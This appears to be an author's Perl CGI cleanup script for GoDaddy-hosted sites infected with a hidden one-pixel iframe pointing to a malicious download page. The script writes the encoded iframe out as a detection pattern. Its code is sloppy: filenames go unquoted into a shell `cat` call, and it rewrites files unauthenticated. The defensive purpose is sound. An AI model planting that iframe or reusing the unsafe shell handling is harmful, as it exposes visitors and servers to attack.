#!/usr/bin/perl

# "http://cdpuvbhfzz.com/dl/adv598.php" cleaning script

# ---------------------------------------- #
# Script by Phil Massyn
# Posted at http://www.massyn.net/?p=195
# ---------------------------------------- #


# = # = # = # = # = # = # = # = # = # = # = # = # = # = # = # = # 

##           Use this script ENTIRELY at your own risk         ##

# = # = # = # = # = # = # = # = # = # = # = # = # = # = # = # = #


## It needs to be uploaded into your /cgi directory (assuming you have Perl installed)
## renamed from .txt to .pl, and made executable.  Access the page via your web browser.
##  It should start cleaning the weird pages

# This script requires (and is built for)

# - a GoDaddy hosting package
# - in Perl (I have the Deluxe hosting package - your milage may vary)
# - Your files must all have rw- (at least) permissions, or else it won't work (then again, that's how these dodgy hackers got in in the first place!!)

## ============================================================================== ##

## Yes, I know the script is dodgy... I know it's not best practice, I know the
## experienced perl coders will shudder and crucify me for this.  Honestly, I don't
## care.. THe script was written as a quick attempt to fix the problem... Use it, 
## or don't.  It's your choice...

## ============================================================================== ##



## The stuff we're looking for in htm, html and php pages

$dodgy{htm} = "<iframe src=\"&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;\" width=1 height=1></iframe>";

$dodgy{html} = $dodgy{htm};
$dodgy{php} = "<\\\?php echo '$dodgy{htm}'; \\\?>";

## Some header info..
print "Content-type: text/html\n\n";

print "<html>\n";

## Get every file in the hosting path (this assumes we're in /cgi and we want to start finding stuff one layer up
foreach $f (`find ..`)
{
	chomp($f);

	$cnt++;

	# I found that Godaddy terminates the script after it uses an excessive amount of Cpu power. If you find that the script only goes up to a certain level, you may want to adjust the 0 to that number, so it can skip ahead
	if($cnt > 0)
	{
		foreach $d (keys %dodgy)
		{
			# if the extention is either .htm, .html or .php (based on the hash %dodgy).....
			if($f =~ /\.$d$/)
			{
	                	print "$cnt - $f<br>\n";

				$out = `cat $f 2>&1`;	

				$dod = $dodgy{$d};

				#... and it contains the dodgy code..
				if($out =~ /$dod/i)
				{
					#.. then clean it...
					&clean($f);
				}
			}
		}
	}
}
print "<h3>Done</h3>\n";
print "</html>\n";

sub clean
{
	print "<b>Cleaning</b>";

	$out =~ s/$dodgy//g;

	# if you'd like to switch the cleaning off, change 1 == 1 to 1 == 0
	# this is handy if you'd like to see what it finds first, before you clean it
	# this cleaning function could be destructive... so BE CAREFUL...

	if(1 == 1)
	{
		open(OUT,">$f") || print "<b>Error</b>\n";;
		print OUT $out;
		close OUT;
	}
	print "<br>\n";
}